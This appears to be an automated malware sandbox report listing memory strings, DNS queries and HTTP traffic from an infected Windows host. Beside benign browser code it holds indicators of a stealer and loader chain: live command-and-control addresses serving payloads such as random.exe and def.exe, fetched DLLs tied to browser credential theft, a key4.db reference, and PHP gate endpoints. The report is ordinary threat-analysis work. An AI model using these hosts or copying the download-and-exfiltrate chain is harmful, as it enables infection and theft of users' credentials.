Source: firefox.exe, 00000031.00000002.3317267748.0000024F701E2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: chrome.exe, 00000022.00000002.2998105902.00006DEC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2884906615.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3079191022.00006DEC00F44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000022.00000002.2998105902.00006DEC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2884906615.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3079191022.00006DEC00F44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc fillHandlerInfo: don't know this type@mozilla.org/network/simple-stream-listener;1_finalizeInternal/this._finalizePromise<http://www.inbox.lv/rfc2368/?value=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttp://compose.mail.yahoo.co.jp/ym/Compose?To=%s@mozilla.org/network/input-stream-pump;1SEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULL equals www.yahoo.com (Yahoo)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F701E2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000003.2872705809.00006DEC006BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2998389906.00006DEC00412000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000003.2872705809.00006DEC006BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2998389906.00006DEC00412000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000002.2995695157.00006DEC002C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: firefox.exe, 00000031.00000002.3342513448.0000024F70E31000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: home.fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: property-imper.sbs
Source: global traffic DNS traffic detected: DNS query: fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic DNS traffic detected: DNS query: www.reddit.com
Source: global traffic DNS traffic detected: DNS query: twitter.com
Source: global traffic DNS traffic detected: DNS query: reddit.map.fastly.net
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
Source: fa55e7c5ed.exe, 0000000D.00000003.2504178943.0000000007B32000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.css
Source: fa55e7c5ed.exe, 0000000D.00000003.2504178943.0000000007B32000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.jpg
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3127317780.0000024F6446D000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: 0718eb7837.exe, 00000010.00000002.3097894570.00000000016B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: 0718eb7837.exe, 00000010.00000002.3097894570.00000000016B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/=Gg
Source: 0718eb7837.exe, 00000010.00000002.3097894570.00000000016B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Ng
Source: 0718eb7837.exe, 00000010.00000002.3097894570.00000000016B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/O
Source: 0718eb7837.exe, 00000010.00000002.3097894570.00000000016B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/W
Source: skotes.exe, 0000000B.00000002.3095371206.000000000151D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 0000000B.00000002.3095371206.000000000151D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exeb
Source: file.exe, 00000000.00000002.2154371815.0000000023462000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000002.2129788119.00000000007A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exeJ
Source: file.exe, 00000000.00000002.2129788119.00000000007A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exem
Source: 0718eb7837.exe, 00000010.00000002.3097894570.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000002.3100558424.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000002.3094604903.0000000001653000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 0718eb7837.exe, 00000010.00000002.3090301764.00000000011CA000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exepleWebKit/537.36
Source: 0718eb7837.exe, 00000010.00000002.3097894570.00000000016B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exestoreek
Source: skotes.exe, 0000000B.00000002.3095371206.000000000151D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 0000000B.00000002.3095371206.000000000151D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe9
Source: skotes.exe, 0000000B.00000002.3095371206.000000000151D000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000002.3097894570.00000000016B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 0000000B.00000002.3095371206.000000000151D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe
Source: 0718eb7837.exe, 00000010.00000002.3094604903.0000000001641000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/off/def.exeault-release/key4.dbPK
Source: file.exe, 00000000.00000002.2130376795.0000000000CC5000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2129788119.000000000074E000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 00000020.00000002.2919990948.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.00000000016A1000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 00000020.00000002.2919990948.0000000001B17000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 00000020.00000002.2919990948.0000000001B05000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 00000020.00000002.2919990948.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2129788119.00000000007A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/2
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllM
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllm
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll_
Source: file.exe, 00000000.00000002.2129788119.00000000007A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: file.exe, 00000000.00000002.2129788119.00000000007A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: file.exe, 00000000.00000002.2129788119.00000000007A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll?
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll?
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.00000000016A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/H
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/RRC:
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 00000020.00000002.2919990948.0000000001B05000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 00000020.00000002.2919990948.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php.%
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.00000000016A1000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 00000020.00000002.2919990948.0000000001B05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: aedbd2e320.exe, 00000020.00000002.2919990948.0000000001B05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/K
Source: file.exe, 00000000.00000003.1903996333.00000000007FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php9
Source: file.exe, 00000000.00000003.1903996333.00000000007FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php9o
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php:%
Source: aedbd2e320.exe, 00000020.00000002.2919990948.0000000001B05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpHu8
Source: file.exe, 00000000.00000003.1903996333.00000000007FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpJ
Source: file.exe, 00000000.00000002.2129788119.0000000000796000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpK
Source: aedbd2e320.exe, 00000020.00000002.2919990948.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpN_)
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpR%
Source: file.exe, 00000000.00000002.2129788119.0000000000796000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpW
Source: file.exe, 00000000.00000002.2154371815.0000000023462000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpamespace
Source: file.exe, 00000000.00000002.2129788119.00000000007A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpi
Source: file.exe, 00000000.00000002.2130376795.0000000000CC5000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpion:
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpn$
Source: file.exe, 00000000.00000002.2129788119.00000000007A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpq
Source: file.exe, 00000000.00000002.2129788119.00000000007A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phprowser
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.00000000016A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpz
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/h
Source: aedbd2e320.exe, 00000020.00000002.2919990948.0000000001B05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/n
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.0000000001698000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ta
Source: aedbd2e320.exe, 00000020.00000002.2919990948.0000000001B05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws
Source: aedbd2e320.exe, 00000020.00000002.2919990948.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206A
Source: file.exe, 00000000.00000002.2129788119.000000000074E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206C
Source: file.exe, 00000000.00000002.2130376795.0000000000CC5000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206ones
Source: skotes.exe, 0000000B.00000002.3095371206.000000000151D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 0000000B.00000002.3095371206.000000000151D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000B.00000002.3095371206.00000000014ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 0000000B.00000002.3095371206.00000000014ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php(
Source: skotes.exe, 0000000B.00000002.3095371206.000000000150B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php8254001
Source: skotes.exe, 0000000B.00000002.3095371206.000000000151D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php:
